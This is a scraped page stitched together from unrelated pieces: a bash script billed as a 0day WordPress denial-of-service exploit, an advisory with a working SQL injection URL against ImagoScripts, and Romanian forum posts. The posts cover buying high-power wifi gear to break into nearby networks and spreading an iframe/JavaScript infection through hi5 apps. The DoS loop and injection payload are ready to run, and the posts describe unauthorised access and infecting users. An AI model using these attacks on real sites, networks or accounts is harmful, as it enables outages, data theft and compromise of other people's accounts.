trxtxx

#!/bin/bash # # Copyright © 2009 Emanuele Gentili < emgent@backtrack.it > # # This program is released under the terms of the GNU General Public License # (GPL), which is distributed with this software in the file "COPYING". # The GPL specifies the terms under which users may copy and use this software. # # WPd0s.sh # This is a 0day DOS issue for Wordpress Core that use cache stressing with random # parameter on multiple requests. # show_help(){ echo "" echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9" echo "" echo " --usage show the exploit Usage" echo " --prereq show the exploit Prerequisites" echo " --credits show the exploit Credits" echo " --help show the Help" echo "" echo "Emanuele Gentili <emgent@backtrack.it>" } show_credits(){ echo "" echo " Emanuele 'emgent' Gentili" echo " http://www.backtrack.it/~emgent/" echo " emgent @ backtrack.it" echo "" } show_prereq(){ echo "" echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9" echo "" echo " Prerequeisites:" echo " Bash (yeah because is cool.)" echo " Curl" echo "" echo " Emanuele Gentili <emgent@backtrack.it>" } show_usage(){ echo "" echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9" echo "" echo " usage $0 --host http://localhost/wordpress/ --requests 1000" echo "" echo " Emanuele Gentili <emgent@backtrack.it>" } # Bash while [[ $# != 0 ]]; do arg_name=$1; shift case "$arg_name" in --help|-?|-h) show_help; exit 0;; --credits) show_credits; exit 0;; --usage) show_usage; exit 0;; --prereq) show_prereq; exit 0;; --host) host=$1; shift;; --requests) requests=$1; shift;; *) echo "invalid option: $1"; show_help;exit 1;; esac done [ -z "$host" ] && { show_help; exit 1; } for random in `seq 1 $requests`; do curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 & done # 2009-12-30 enJoy.

Exploit Title:ImagoScripts Deviant Art Clone SQL Injection Vulnerability Date: 4/1/2010 Author: alnjm33 Software Link: http://imagoscripts.com/index.php?act=viewProd&productId=2 it cost 50$ ________________________ first join in site site/path/index.php?mode=join then log in and this is exploit site/path//index.php?mode=forums&act=viewcat&seid=-1/**/union/**/select 1,version(),3,4--

scuzati ca sunt off-topic dar rad cu lacrimi si tare interesant...partea cu telefonu bagat in masina, aveam 2 prieteni care se imbatau in fiecare week-end rau cand eram in barcelona si faceau baie in mare, m-am saturat cate telefoane am pierdut pana le-am cumparat de alea rezistente la apa va recomand si voua..e cea mai buna solutie pt de astea:)

pai nu sunt preturile mele fratilor asa le vand oamenii am blat la o firma din bucuresti care nu vinde la persoane fizice echipamente de astea si numai la firme dar mie mi-au dat so. anyway va recomand de la astia de pe radiolabs.com pt ca sunt foarte tari placile astea si pt ce va trebuie sunt ok VIN cu tot cu drivere de linux, si sunt detectabile pe backtrack 2 3 4 folosite asa ca nu zic din auzite daca aveti vreo placa wifi cu cablu pt antena, daca cablul de la antena este prea lung nu o sa va mearga airreplay, cablul trebe sa fie pana in 1 m ca sa va mearga 100%.

NU fac reclama dar eu am cumparat de acolo ( cash ) nu carduit, pt asa ceva am alt site pt cine e interesat dar nu trimit in romania trimit in macedonia pt cine poate acolo eu mi-am cumparat ¤Wave Magnum || - USB WiFi Adapter ( merge IMPECABIL ) daca ai cu o antena cumparata din romania sau de oriunde 1 2 3 4 5 retele cu asta ai cel putin 20 in acelasi loc. ¤RadioLabs || CaptiFi - High Power USB Wifi Antenna asta e noua nu am cumparat dar cred ca o sa o cumpar...ce v-as recomanda pt cei care au bani de investit si merita wave-magnum + WiFi Antenna | High Gain 802.11 Omni Wireless Antenna - e cea mai ieftina solutie pt o chestie BUNA RAU DAR Radiolabs - The Grid - 802.11 Antenna asta e cea mai nesimtita ( am 2 si din astea + amplificator ) si iau net printre blocuri de la parter la vreo 600-700 de metrii printre cel putin 4 5 6 blokuri fara vedere catre locul ala:) merge probata pt cine vrea ajutor in legatura cu astea pot procura si din tara ( fara profit pt mine ) daca va ajut cu chestia asta pt mine e ok mai multi haceri de wifi

Nemesis the god of HI5 ori te angajeaza aia la iei sa ii repari ori iti dau bani sa ii repari eu unu sunt fan HI5 deabi astept sa reusesc cu tot...ca am cateva pitzipoance care o sa planga daca nu isi mai vad pozele acolo . edit: da intai sa execute linkul care ii face developeri si dupa sa execute iframe-ul cu aplicatia noastra asa o sa mearga si dupa sa se infecteze toti in acelasi mod...sa execute prima oara developer si dupa iframe acela care ai zis la inceputul acestui tutorial pt ca a mers si la mine pana la urma doar cu o aplicatie aprobata de hi5.. astept cu nerabdare si tutorialul cu treaba asta

a mers dar aplicatia nu a fost validata, se poate viziona de pe alte conturi, dar daca adaug alt ID de aplicatie validata merge, dar daca il adaug pe al meu care nu a fost inca validat NU merge. o sa imi bat capul cumva sa vad cum sa fac daca nu iar il stresez pe nemesis

da mi-a mers si mie multumesc:)

da am observat ca mi-a aparut la mine, ce ai scris in tinyurl.com/pulamea1 ? care e linkul de l-ai pus acolo ?

mi-a mers si mie multumesc

stai ca mi-a mers:) a aparut acum sa ma descurc sa o adaug fortat si pe contul care o vede

am observat update-ul facut. am intrat pe contu ala ce ai zis tu a aparut javascriptul cu eroarea 1, m-am uitat in sursa e ok trebuie sa mearga, dar poti sa faci de test sa vedem daca imi adauga aplicatia ta la mine pe cont ? la mine nu am reusit sa imi activeze astia aplicatia sa o vad de pe alte conturi si am tot luat de la capat. mai fac odata cum ai zis tu dau direct acolo la sample ii dau add to my profile si dupa ma apuc sa pun iar iframe src=google.com sa vedem daca e vizibil si de alte conturi

fa o poza de preferabil cum ai tu acolo exact, daca la tine a mers sigur trebe sa mearga si la restul, si la about me unde il ai...pt ca nu reusesc sa il editez fara encodare. in cat timp aplicatia o sa fie valida sa o vada si altii ? aia de test macar cu hello world

mai merge ? am incercat si eu de pe 3 conturi diferite si nu mi-a adaugat aplicatia pe ele imi dadea ca aplicatia inca nu a fost aprobata ceva de genu

da mie nu mi-a mers, imi tot dadea o eroare ca lu church am reusit am encodat linkul nu a mai dat nici o eroare dar am incercat de pe alte conturi si nu mi le-a instalat si pe conturile alea. ce gresesc? sau mai bine zis le instaleaza automat si lor ? sau trebuie sa dea click sa le instaleze aplicatia si lor edit: ERROR! The application is not approved yet. Unable to add. asta mi-a dat cand am dat click direct pe linkul din live headers care seamana cu al tau http://hi5.com/friend/apps/addApp.do?referrer=&privacy=1&privacy=2&privacy=3&privacy=4&privacy=5&appId=44156&appContext=1